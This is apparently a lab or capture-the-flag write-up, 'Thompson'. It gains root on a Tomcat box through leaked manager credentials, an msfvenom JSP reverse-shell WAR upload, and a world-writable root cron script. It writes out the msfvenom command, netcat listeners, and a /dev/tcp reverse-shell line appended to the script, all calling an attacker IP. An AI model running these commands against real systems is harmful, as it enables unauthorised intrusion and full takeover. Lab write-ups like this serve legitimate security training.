Thompson
This report details a successful penetration test against a target system running Apache Tomcat. The attack vector exploited a default/weak credential vulnerability in the Tomcat Manager application, leading to remote code execution (RCE) via a malicious WAR file upload. Further enumeration revealed a scheduled task running as root, which was leveraged to achieve privilege escalation.
1. Reconnaissance and Enumeration
1.1. Port Scanning
export TARGET_IP=10.10.130.14
nmap -p- --min-rate 5000 $TARGET_IP
Results:
Not shown: 65371 closed tcp ports (reset), 161 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
8009/tcp open ajp13
8080/tcp open http-proxy
1.2. Web Application Enumeration
Based on the nmap
results, we focused on port 8080. Browsing to http://$TARGET_IP:8080
revealed the default Apache Tomcat welcome page. Further investigation identified a potential /manager
path, consistent with the Tomcat Manager application.
Reference: Apache Tomcat Manager Application Documentation
2. Exploitation: Tomcat Manager Weak Credentials
2.1. Identifying Default Credentials
Accessing http://$TARGET_IP:8080/manager
prompted for authentication. Canceling the authentication request resulted in a 401 Unauthorized
error page. Critically, this error page revealed example credentials within the HTML source code.
Explanation: The error page inadvertently disclosed configuration instructions that included a sample username (tomcat
) and password (s3cret
). This is a serious security flaw, as default or easily guessable credentials are a common attack vector.
2.2. Gaining Access via WAR File Upload
Using the discovered credentials (tomcat:s3cret
), we successfully logged into the Tomcat Manager application. This application provides a feature to deploy web applications by uploading WAR (Web Application Archive) files.
2.3. Crafting a Reverse Shell Payload
A malicious WAR file containing a JSP (JavaServer Pages) reverse shell was created using msfvenom
:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.2.17.44 LPORT=6666 -f war > reverse.war
2.4. Deploying the Payload and Obtaining a Shell
The reverse.war
file was uploaded through the Tomcat Manager interface. A netcat
listener was started on the attacker's machine:
nc -lvnp 6666
Then, the deployed application was accessed by navigating to http://$TARGET_IP:8080/reverse/
. This triggered the reverse shell, establishing a connection to the listener:
id # uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
3. Post-Exploitation and Privilege Escalation
3.1. Terminal Sanitization
To improve the interactive shell experience, the following steps were taken to sanitize the terminal:
script /dev/null -c bash # Start a clean bash session recording to /dev/null
# Press CTRL + Z (to background the process)
stty raw -echo; fg # Set terminal to raw mode and bring the process back to foreground
reset xterm # Reset the terminal
export TERM=xterm # Set the terminal type
export SHELL=/bin/bash # Set the shell explicitly
stty size # Determine current terminal dimensions
stty rows <ROWS> columns <COLUMNS> # Set terminal dimensions (replace <ROWS> and <COLUMNS> with output from stty size)
3.2. Enumerating Scheduled Tasks
The system was enumerated to identify potential privilege escalation paths. The /etc/crontab
file was examined to list scheduled tasks:
cat /etc/crontab
Output:
* * * * * root cd /home/jack && bash id.sh
Analysis: This reveals a cron job running as root
every minute. The job changes the directory to /home/jack
and executes the script id.sh
.
3.3. Identifying a Writable Script
The permissions of the id.sh
script were checked:
ls -l /home/jack/id.sh
-rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh
Explanation: The script id.sh
had write permissions for all users. This is a critical vulnerability, as any user can modify a script that is executed by root
.
The content of the script was checked.
cat /home/jack/id.sh
#!/bin/bash
id > test.txt
3.4. Exploiting the Cron Job for Privilege Escalation
A reverse shell command was appended to the id.sh
script:
echo "sh -i >& /dev/tcp/10.2.17.44/6666 0>&1" >> /home/jack/id.sh
A new netcat
listener was started on the attacker's machine:
nc -lvnp 6666
Within a minute, the cron job executed the modified script, resulting in a reverse shell connection as root
:
id # uid=0(root) gid=0(root) groups=0(root)
Result: Privilege escalation to root
achieved.